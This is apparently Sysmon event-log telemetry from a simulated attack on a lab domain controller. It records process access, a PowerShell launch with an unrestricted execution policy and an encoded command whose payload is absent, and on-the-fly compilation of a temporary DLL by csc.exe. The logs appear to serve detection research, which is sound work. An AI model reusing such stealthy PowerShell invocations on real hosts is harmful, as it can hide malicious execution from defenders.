10341000x8000000000000000256Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:56.215{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000255Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.215{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000254Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:56.215{266CAFBE-62C8-6064-0500-00000000AD01}620744C:\Windows\system32\csrss.exe{266CAFBE-643C-6064-C902-00000000AD01}3884C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000253Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.215{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000252Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:56.215{266CAFBE-6439-6064-C802-00000000AD01}50524644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-643C-6064-C902-00000000AD01}3884C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e7abfff7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f43480(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f430bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e7a0b3b9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f0002d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f63a9f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f45aae(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f45aae(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c47
1afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f4593f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f3665f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f43ba1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f4376e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f43480(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f430bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e7a0b3b9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f28366(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f278d8(wow64) 154100x8000000000000000251Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.220{266CAFBE-643C-6064-C902-00000000AD01}3884C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
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C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6439-6064-4FB3-100000000000}0x10b34f0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-6439-6064-C802-00000000AD01}5052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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 10341000x8000000000000000250Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.137{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-6439-6064-C802-00000000AD01}5052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000249Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:56.137{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-6439-6064-C802-00000000AD01}5052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000330Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.934{266CAFBE-643C-6064-C902-00000000AD01}3884ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\ay2yhusm.0.csMD5=054C0A1487614BA970CB949FA443FFFB,SHA256=6B88C7F565FF6B5879B03F6F3622B596B63D0C76E3EC5751390A446AF187E21D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000329Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.934{266CAFBE-643C-6064-C902-00000000AD01}3884ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\ay2yhusm.dllMD5=61375BFD46E9983B5E2BD15E199EFB6D,SHA256=29DD67D3DD6C039E8CF1C6383B1E19F798601AD356933016A53B7A17F5AFDF09,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x8000000000000000328Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:57.934{266CAFBE-643C-6064-C902-00000000AD01}3884ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\ay2yhusm.pdbMD5=F895E1658465172E098A433DEDAB15C5,SHA256=F538CABA87E99A26AB74B9DAD04E7D61C477D40387C17F4CE309B30928349E08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000327Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.934{266CAFBE-643C-6064-C902-00000000AD01}3884ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\ay2yhusm.outMD5=BFD910673FBB71A8E180BDE8128C3F7C,SHA256=2C15D66D586503292D99CAD2C7DF98AD027DAAF7FD14EFA3DE849F72B32C6C2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000326Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.934{266CAFBE-643C-6064-C902-00000000AD01}3884ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\ay2yhusm.cmdlineMD5=EFBBCF217404BFE509DB3E7AB89B5FFE,SHA256=CF596FD71334E23CFBB83641B7ABB695E379C3186B1885DBC28940E6DD653D2C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000325Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.919{266CAFBE-643D-6064-CB02-00000000AD01}3828ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\CSC2D44CB7CC3432D8BD42593E465E72.TMPMD5=97B487B2F9330660F20421213EE10B64,SHA256=BE458053792BA87B1CF8D0A99CAA615A4F0327BE23C4D42673759E127975A3AC,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000324Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localDLL2021-03-31 
11:59:57.919{266CAFBE-643D-6064-CB02-00000000AD01}3828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\ay2yhusm.dll2021-03-31 11:59:57.700 23542300x8000000000000000323Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.919{266CAFBE-643D-6064-CB02-00000000AD01}3828ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\ay2yhusm.dllMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000322Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.919{266CAFBE-643D-6064-CB02-00000000AD01}3828ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\ADMINI~1\AppData\Local\Temp\RESC5A9.tmpMD5=687B477666B08C851B2D066954EBAE63,SHA256=FA8D0BC8BA877C6A026C36E4FEE802753DE6413E7B76239F49D4D383201BF17E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000321Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.919{266CAFBE-643D-6064-CC02-00000000AD01}4852ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Users\ADMINI~1\AppData\Local\Temp\RESC5A9.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000320Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:57.903{266CAFBE-6439-6064-C602-00000000AD01}49122544C:\Windows\system32\conhost.exe{266CAFBE-643D-6064-CC02-00000000AD01}4852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000319Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.903{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000318Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:57.903{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000317Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.903{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000316Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:57.903{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000315Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.903{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000314Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:57.903{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000313Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.903{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000312Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:57.903{266CAFBE-62C8-6064-0500-00000000AD01}6201152C:\Windows\system32\csrss.exe{266CAFBE-643D-6064-CC02-00000000AD01}4852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000311Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.903{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000310Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:57.903{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000309Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 